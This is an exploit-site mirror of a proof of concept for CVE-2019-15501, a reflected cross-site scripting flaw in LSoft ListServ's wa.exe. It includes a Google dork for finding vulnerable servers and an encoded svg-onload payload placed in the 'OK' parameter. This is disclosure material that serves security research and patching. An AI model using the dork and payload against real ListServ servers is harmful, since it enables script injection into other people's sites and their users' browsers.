Advertisement






LSoft ListServ Cross Site Scripting

CVE Category Price Severity
CVE-2019-15501 CWE-79 Not specified High
Author Risk Exploitation Type Date
Patrik Fehrenbach High Remote 2019-08-27
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02157 0.69967

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080137

Below is a copy:

LSoft ListServ Cross Site Scripting
# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Softwae Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501

# Software description:
The term Listserv has been used to refer to electronic mailing list software applications in general, 
but is more properly applied to a few early instances of such software, which allows a sender to send one 
email to the list, and then transparently sends it on to the addresses of the subscribers to the list. 

# POC

1. http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
2.http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>

# References:
1.http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
2.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum